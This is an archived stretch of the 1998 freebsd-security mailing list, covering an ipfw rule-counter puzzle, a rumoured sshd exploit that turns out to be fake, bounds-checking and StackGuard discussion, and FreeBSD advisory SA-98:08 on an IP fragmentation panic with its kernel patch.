packet > on rule 65535 sneak by 65534 :-) A fluke? A 1 in a million chance? As others have already pointed out, this packet was probably sent before rule 65534 was configured. To verify this, run ipfw -t l to check the timestamp on rule 65535...my guess is it will be equivalent to either your time of last boot (sysctl kern.boottime), or whenever you last reloaded your ruleset. Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 09:51:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA01412 for freebsd-security-outgoing; Wed, 4 Nov 1998 09:51:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA01404 for ; Wed, 4 Nov 1998 09:51:00 -0800 (PST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id TAA00172; Wed, 4 Nov 1998 19:49:51 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199811041749.TAA00172@gratis.grondar.za> To: "Jordan K. Hubbard" cc: agora@uol.com.br, FreeBSD Security , Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: Re: [Fwd: SSHD Exploit] In-Reply-To: Your message of " Wed, 04 Nov 1998 07:26:25 PST." <5769.910193185@time.cdrom.com> References: <5769.910193185@time.cdrom.com> Date: Wed, 04 Nov 1998 19:49:50 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jordan K. Hubbard" wrote: > Bah. *More* rumors without proof. "I will not post this exploit.." My sentiments exactly. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 09:51:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA01541 for freebsd-security-outgoing; Wed, 4 Nov 1998 09:51:41 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from trooper.velocet.ca (host-034.canadiantire.ca [209.146.201.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA01518 for ; Wed, 4 Nov 1998 09:51:35 -0800 (PST) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id MAA14723; Wed, 4 Nov 1998 12:48:42 -0500 (EST) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <13888.37754.189607.428001@trooper.velocet.ca> Date: Wed, 4 Nov 1998 12:48:42 -0500 (EST) To: Open Systems Networking Cc: freebsd-security@FreeBSD.ORG Subject: Amazing wonder packet sneaks by deny all rule? In-Reply-To: References: X-Mailer: VM 6.62 under Emacs 19.34.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Open" == Open Systems Networking writes: Open> It's really late/early this morning and I was just checking the Open> rule set on a clients machine I just built. When I saw this: Open> 65534 195 14104 deny log ip from any to any Open> 65535 1 76 deny ip from any to any Open> Now maybe it's my lack of sleep but how did that amazing wonder Open> packet on rule 65535 sneak by 65534 :-) A fluke? A 1 in a Open> million chance? A posessed packet? This isn't exactly the kind Open> of thing that instills confidence in ones choice of firewall Open> software :-) It's ipfw BTW if you cant tell from the syntax, not Open> ipfilter. I have NEVER seen this happen before, so im guessing Open> it's just a freak accident. But it is curious nonetheless. Actually, it was likely a packet that occured between the 'ipfw flush' and the subsequent 'ipfw add 65534' line. I see this all the time on our busier firewalls. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 10:49:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA09882 for freebsd-security-outgoing; Wed, 4 Nov 1998 10:49:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA09872 for ; Wed, 4 Nov 1998 10:49:54 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) id KAA02420; Wed, 4 Nov 1998 10:48:45 -0800 (PST) Message-ID: <19981104104845.A1532@best.com> Date: Wed, 4 Nov 1998 10:48:45 -0800 From: "Jan B. Koum " To: agora@uol.com.br, FreeBSD Security Cc: Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: Re: [Fwd: SSHD Exploit] References: <364054DC.DF96B116@agoractvm.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.93.2i In-Reply-To: =?iso-8859-1?Q?=3C364054DC=2EDF96B116=40agoractvm=2Ecom=2Ebr=3E=3B_from_?= =?iso-8859-1?Q?Teleinform=E1tica_on_Wed=2C_Nov_04=2C_1998_at_11:21:32AM_?= =?iso-8859-1?Q?-0200?= Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 11:21:32AM -0200, Teleinformática wrote: > > > -- > Regards, > _______________________ > | Nelson 'Stderr' Brito |_________________________________ > |_________________________________________________________| > |Finger Print: | A2E0 D90E 413A 515A 10C9 C0CE 4855 D523 | > | E-mail: | nelson@cyberspace.org | > | URL: | http://www.angelfire.com/sd/stderr | > | Public key: | See the URL | > |______________|__________________________________________| > |ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo| > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > Received: by pascal (mbox agora) > (with Cubic Circle's cucipop (v1.22 1998/04/11) Wed Nov 4 09:24:47 1998) > X-From_: root Wed Nov 4 01:08:10 1998 > Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) > by pascal.uol.com.br (8.9.1/8.9.1) with ESMTP id BAA12002; > Wed, 4 Nov 1998 01:08:03 -0200 (EDT) > Received: from netspace.org ([128.148.157.6]:54856 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <77774-27536>; Tue, 3 Nov 1998 21:37:34 -0500 > Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with > spool id 4569238 for BUGTRAQ@NETSPACE.ORG; Tue, 3 Nov 1998 21:30:42 > -0500 > Approved-By: aleph1@DFW.NET > Received: from gti.net (apollo.gti.net [199.171.27.7]) by netspace.org > (8.8.7/8.8.7) with ESMTP id RAA18872 for ; Sun, > 1 Nov 1998 17:05:06 -0500 > Received: from localhost (jfoutts@localhost) by gti.net (8.9.1/8.8.8) with > ESMTP id RAA24814 for ; Sun, 1 Nov 1998 > 17:05:07 -0500 (EST) > MIME-Version: 1.0 > Content-Type: TEXT/PLAIN; charset=US-ASCII > Message-ID: > Date: Sun, 1 Nov 1998 17:05:07 -0500 > Reply-To: Justin Foutts > Sender: Bugtraq List > From: Justin Foutts > Subject: SSHD Exploit > To: BUGTRAQ@netspace.org > X-Mozilla-Status2: 00000000 > > On a system I administer I found a program named sshdwarez.c in one of my > user's home directories. Upon further inspection I found that this was > the source code of an x86/Linux remote buffer overflow exploit for sshd > versions 1.2.26 and below. I have tested this exploit on a number of my > systems and have obtained remote root access on each one. I will not post > this exploit as it could give crackers a tool to gain unauthorized access > to systems. I STRONGLY recommend that everyone upgrade their versions of > sshd as soon as possible. > > Thanks! > Justin > [quoting a1] Date: Wed, 4 Nov 1998 11:22:08 -0600 From: Aleph One Subject: Re: SSHD Exploit To: BUGTRAQ@netspace.org This one was a fake folks. Little kids having their fun. Apologies for approving it. It was a long day. All persons that have examined the ssh code so far have found it to be secure (so far). If you require a safety net to sleep well at night while running sshd I recommend you recompile it with the StackGuard compiler (if you are running on a x86 or want to port it). http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 [end] Can we let all the SSH threads die now?!?! Please? :) -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 10:53:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA10770 for freebsd-security-outgoing; Wed, 4 Nov 1998 10:53:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phoenix (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA10761 for ; Wed, 4 Nov 1998 10:53:53 -0800 (PST) (envelope-from brich@aye.net) Received: (qmail 2461 invoked by uid 7506); 4 Nov 1998 18:52:25 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Nov 1998 18:52:25 -0000 Date: Wed, 4 Nov 1998 13:52:25 -0500 (EST) From: Barrett Richardson To: Warner Losh cc: spork , Andrew McNaughton , bow , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: <199811041720.KAA00555@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Nov 1998, Warner Losh wrote: > In message Barrett Richardson writes: > : I recently got the stackguard compiler > : http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ > : up and going on my 2.2.7 box. I had high hopes that some definitive > : info of the SSH exploit would surface so I could test it against > : something real. > > StackGuard only supports Linux/elf on intel right now. However, it I have it up and going on my 2.2.7 box. Been running some stackguard compiled apps (ssh 1.2.26 for one) and they've been working like a champ. Wrote a couple of test programs to see if it would catch a canary overrun, and indeed it does. Did nothing to the sources but twiddle with dots and underscores. Why would aout vs. elf matter? Are the stack frames different? It's been working for me. Did have to build gas. -- Barrett > wouldn't be too hard to add FreeBSD elf to this list. FreeBSD aout > would be much harder... > > Warner > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 10:54:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA11125 for freebsd-security-outgoing; Wed, 4 Nov 1998 10:54:31 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA11106 for ; Wed, 4 Nov 1998 10:54:29 -0800 (PST) (envelope-from marcs@znep.com) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.9.1a/8.9.1) with UUCP id LAA09640; Wed, 4 Nov 1998 11:54:09 -0700 (MST) Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with ESMTP id KAA14459; Wed, 4 Nov 1998 10:48:53 -0800 (PST) Date: Wed, 4 Nov 1998 10:48:53 -0800 (PST) From: Marc Slemko To: Andrew McNaughton cc: FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Nov 1998, Andrew McNaughton wrote: > On Wed, 4 Nov 1998, Nicholas Charles Brawn wrote: > > > Well I just grabbed 1.2.26 and did: > > find . -exec grep sprintf {} \; |wc -l > > > > And came up with 138 lines. Just having sprintf() in your code is not > > indicative of a vulnerability, but it's still a high number. > > ssh is commonly used for piping substantial ammounts of data, and can > probably claim good reasons for using the faster non-bounds-checking > routines in many of these cases. Doesn't apply to low volume things like > the logging routines though. NO! Get all ideas of bounds checking only being suitable for "low volume" things out of your mind. First, if ssh is using sprintf for any bulk data copies then it is horribly broken anyway. Second, by the very nature of bulk data copies you have to have fixed bounds on the size of the data you are copying. Functions that do bounds checking, like snprintf() are not have any significant performance drawbacks in 99.9% of the cases. There are far more differences between sprintf implementations than between sprintf and snprintf. In fact, on FreeBSD sprintf() and snprintf() both call the same function, the only difference is that sprintf sets _size to INT_MAX while snprintf sets it to what you tell it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 11:07:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA13759 for freebsd-security-outgoing; Wed, 4 Nov 1998 11:07:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA13754 for ; Wed, 4 Nov 1998 11:07:20 -0800 (PST) (envelope-from cschuber@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.9.1/8.8.8) id LAA31825 for ; Wed, 4 Nov 1998 11:07:11 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda31823; Wed Nov 4 11:07:08 1998 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.1/8.9.1) id LAA28962 for ; Wed, 4 Nov 1998 11:07:08 -0800 (PST) Message-Id: <199811041907.LAA28962@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdv28955; Wed Nov 4 11:06:20 1998 X-Mailer: exmh version 2.0.2 2/24/98 Reply-to: Cy Schubert - ITSD Open Systems Group X-Sender: cschuber To: freebsd-security@FreeBSD.ORG Subject: Re: SSHD Exploit Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Nov 1998 11:06:20 -0800 From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It is normally against my policy to forward posts from one mailing list to another, however this should answer some of the questions cause by a previous "cross post" from BUGTRAQ. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC ------- Forwarded Message Return-Path: owner-bugtraq@netspace.org Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.1/8.9.1) id JAA24588 for ; Wed, 4 Nov 1998 09:44:46 -0800 (PST) Received: from point.osg.gov.bc.ca(142.32.102.44) via SMTP by passer.osg.gov.bc.ca, id smtpdq24585; Wed Nov 4 09:43:47 1998 Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.9.1/8.8.8) id JAA31567 for ; Wed, 4 Nov 1998 09:43:34 -0800 Received: from brimstone.netspace.org(128.148.157.143) via SMTP by point.osg.gov.bc.ca, id smtpda31565; Wed Nov 4 09:43:18 1998 Received: from netspace.org ([128.148.157.6]:10872 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <77546-30278>; Wed, 4 Nov 1998 12:38:10 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4640495 for BUGTRAQ@NETSPACE.ORG; Wed, 4 Nov 1998 12:31:03 -0500 Approved-By: aleph1@DFW.NET Received: from dfw.nationwide.net (dfw.nationwide.net [198.175.15.10]) by netspace.org (8.8.7/8.8.7) with ESMTP id MAA08242 for ; Wed, 4 Nov 1998 12:25:01 -0500 Received: from localhost (aleph1@localhost) by dfw.nationwide.net (8.9.0/8.9.0) with SMTP id LAA15322 for ; Wed, 4 Nov 1998 11:22:09 -0600 (CST) X-Sender: aleph1@dfw.nationwide.net MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Wed, 4 Nov 1998 11:22:08 -0600 Reply-To: Aleph One Sender: Bugtraq List From: Aleph One Subject: Re: SSHD Exploit To: BUGTRAQ@netspace.org This one was a fake folks. Little kids having their fun. Apologies for approving it. It was a long day. All persons that have examined the ssh code so far have found it to be secure (so far). If you require a safety net to sleep well at night while running sshd I recommend you recompile it with the StackGuard compiler (if you are running on a x86 or want to port it). http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 11:37:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA19846 for freebsd-security-outgoing; Wed, 4 Nov 1998 11:37:48 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA19841; Wed, 4 Nov 1998 11:37:40 -0800 (PST) (envelope-from security-officer@freebsd.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id UAA12845; Wed, 4 Nov 1998 20:37:28 +0100 (MET) Date: Wed, 4 Nov 1998 20:37:28 +0100 (MET) Message-Id: <199811041937.UAA12845@gvr.gvr.org> From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment Reply-To: security-officer@FreeBSD.ORG To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-98:08 Security Advisory FreeBSD, Inc. Topic: IP fragmentation denial of service Category: core Module: kernel Announced: 1998-11-04 Affects: FreeBSD 3.0 and FreeBSD-current before the correction date. Corrected: FreeBSD-3.0 and FreeBSD-current as of 1998/10/27 FreeBSD only: Yes Patches: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:08/ I. Background IP connections are controlled through a series of packets that are received by the two computers involved in the connection. When packets are too large to be sent in a single IP packet (due to interface hardware limitations for example), they can be fragmented (unless prohibited by the Don't Fragment flag). The final destination will reassemble all the fragments of an IP packet and pass it to higher protocol layers (like TCP or UDP). II. Problem Description There is a bug in the IP fragment reassembly code that might lead to a kernel panic. An attacker can create and send a pair of malformed IP packets which are then reassembled into an invalid UDP datagram. Such an UDP datagram would then cause a server to panic and crash. III. Impact When this bug is exploited the operating system will panic. This results in a reboot of the system. This vulnerability has been discussed in public security forums and exploit programs are circulating to take advantage of this bug. IV. Workaround None. V. Solution Index: ip_input.c =================================================================== RCS file: /home/cvsup/freebsd/CVS/src/sys/netinet/ip_input.c,v retrieving revision 1.102 retrieving revision 1.103 diff -u -u -r1.102 -r1.103 --- ip_input.c 1998/10/16 03:55:01 1.102 +++ ip_input.c 1998/10/27 09:11:41 1.103 @@ -750,7 +750,7 @@ * if they are completely covered, dequeue them. */ for (; q != NULL && ip->ip_off + ip->ip_len > GETIP(q)->ip_off; - p = q, q = nq) { + q = nq) { i = (ip->ip_off + ip->ip_len) - GETIP(q)->ip_off; if (i < GETIP(q)->ip_len) { ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org Security notifications: security-notifications@freebsd.org Security public discussion: freebsd-security@freebsd.org PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBNkCrf1UuHi5z0oilAQE0GgQAga3x91fd4QU8/vXKkPp8h2hUmHifhdIc K4PynSKtqP8IQFzMzGApMU5MLCV2s6cXLj2cznAuCcHiF6xWsTIf1JoqgtaYZaTS pBtW9Dxp+5OYlVnGHfijUbO8sop2PpAqaBpVv2CnxYvFz3sMbM8z1H7wkWEHvL7Z MHXYAJ2Apfk= =fOyn -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 12:35:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA28740 for freebsd-security-outgoing; Wed, 4 Nov 1998 12:35:08 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id MAA28715 for ; Wed, 4 Nov 1998 12:35:00 -0800 (PST) (envelope-from sthaug@nethelp.no) From: sthaug@nethelp.no Received: (qmail 11128 invoked by uid 1001); 4 Nov 1998 20:34:48 +0000 (GMT) To: security-officer@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment In-Reply-To: Your message of "Wed, 4 Nov 1998 20:37:28 +0100 (MET)" References: <199811041937.UAA12845@gvr.gvr.org> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 04 Nov 1998 21:34:48 +0100 Message-ID: <11126.910211688@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Topic: IP fragmentation denial of service > > Category: core > Module: kernel > Announced: 1998-11-04 > Affects: FreeBSD 3.0 and > FreeBSD-current before the correction date. > Corrected: FreeBSD-3.0 and FreeBSD-current as of 1998/10/27 > FreeBSD only: Yes > > Patches: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:08/ Please note that the fragment and fragment.asc files in the SA-98:08 directory are in reality the rst-current and rst-current.asc from SA-98:07. You probably want to change this. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 12:44:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA00828 for freebsd-security-outgoing; Wed, 4 Nov 1998 12:44:50 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA00797; Wed, 4 Nov 1998 12:44:33 -0800 (PST) (envelope-from guido@gvr.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id VAA13432; Wed, 4 Nov 1998 21:44:12 +0100 (MET) Message-ID: <19981104214411.A13413@gvr.org> Date: Wed, 4 Nov 1998 21:44:11 +0100 From: Guido van Rooij To: sthaug@nethelp.no, security-officer@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment References: <199811041937.UAA12845@gvr.gvr.org> <11126.910211688@verdi.nethelp.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <11126.910211688@verdi.nethelp.no>; from sthaug@nethelp.no on Wed, Nov 04, 1998 at 09:34:48PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 09:34:48PM +0100, sthaug@nethelp.no wrote: > > Please note that the fragment and fragment.asc files in the SA-98:08 > directory are in reality the rst-current and rst-current.asc from > SA-98:07. You probably want to change this. > Yikes! Thanks for the notice... I've corrected it now. -Guido To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 13:24:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA08124 for freebsd-security-outgoing; Wed, 4 Nov 1998 13:24:15 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from nefertiti.lightningweb.com (nefertiti.lightningweb.com [198.68.191.157]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA08104 for ; Wed, 4 Nov 1998 13:24:09 -0800 (PST) (envelope-from keith@lightningweb.com) Received: from localhost (keith@localhost) by nefertiti.lightningweb.com (8.8.7/8.8.5) with SMTP id NAA08418 for ; Wed, 4 Nov 1998 13:25:11 -0800 (PST) Date: Wed, 4 Nov 1998 13:25:10 -0800 (PST) From: Keith Woodman To: freebsd-security@FreeBSD.ORG Subject: ip_input.c Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have a mail regarding the ip_input.c bug that has a patch out now. I am rather new and am running 2.2.5 - RELEASE. I hope to clear up several questions here. 1) What are the differences between. -current -stable -RELEASE ?? 2) Since I am running a server with 2.2.5 -RELEASE, does this needed patch apply to me? 3) How do I implement the patch? patch ip_input.c patch_source ???? Thanks for the help. Keith W. ---------------------------------------------------------------------- Keith Woodman Technical Coordinator Keith@lightningweb.com Lightningweb LLC pid 7962 (sniffit), uid 0: exited on signal 10 (core dumped) ---------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 14:07:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA15033 for freebsd-security-outgoing; Wed, 4 Nov 1998 14:07:16 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA15026 for ; Wed, 4 Nov 1998 14:07:13 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) id OAA18756; Wed, 4 Nov 1998 14:06:44 -0800 (PST) Message-ID: <19981104140643.A17685@best.com> Date: Wed, 4 Nov 1998 14:06:43 -0800 From: "Jan B. Koum " To: Keith Woodman , freebsd-security@FreeBSD.ORG Subject: Re: ip_input.c References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Keith Woodman on Wed, Nov 04, 1998 at 01:25:10PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 01:25:10PM -0800, Keith Woodman wrote: > I have a mail regarding the ip_input.c bug that has a patch out now. > I am rather new and am running 2.2.5 - RELEASE. > I hope to clear up several questions here. > > 1) What are the differences between. -current -stable -RELEASE ?? > > 2) Since I am running a server with 2.2.5 -RELEASE, does this needed patch > apply to me? > > 3) How do I implement the patch? patch ip_input.c patch_source ???? > > Thanks for the help. > Keith W. > > > ---------------------------------------------------------------------- > > Keith Woodman Technical Coordinator > Keith@lightningweb.com Lightningweb LLC > > > pid 7962 (sniffit), uid 0: exited on signal 10 (core dumped) > ---------------------------------------------------------------------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message If you read the advisory, it say: Affects: FreeBSD 3.0 and FreeBSD-current before the correction date. Are you running 3.0 or -current? No. The 2.2 branch is not affected at all. -- Yan I don't have the password .... + Jan Koum But the path is chainlinked .. | Spelled Jan, pronounced Yan. There. So if you've got the time .... | Web: http://www.best.com/~jkb Set the tone to sync ......... + OS: http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 14:52:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA23064 for freebsd-security-outgoing; Wed, 4 Nov 1998 14:52:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA23055; Wed, 4 Nov 1998 14:52:44 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id PAA21704; Wed, 4 Nov 1998 15:52:33 -0700 (MST) Message-Id: <4.1.19981104155202.042f8dc0@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 04 Nov 1998 15:52:29 -0700 To: Guido van Rooij , sthaug@nethelp.no, security-officer@FreeBSD.ORG From: Brett Glass Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment Cc: security@FreeBSD.ORG In-Reply-To: <19981104214411.A13413@gvr.org> References: <11126.910211688@verdi.nethelp.no> <199811041937.UAA12845@gvr.gvr.org> <11126.910211688@verdi.nethelp.no> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: 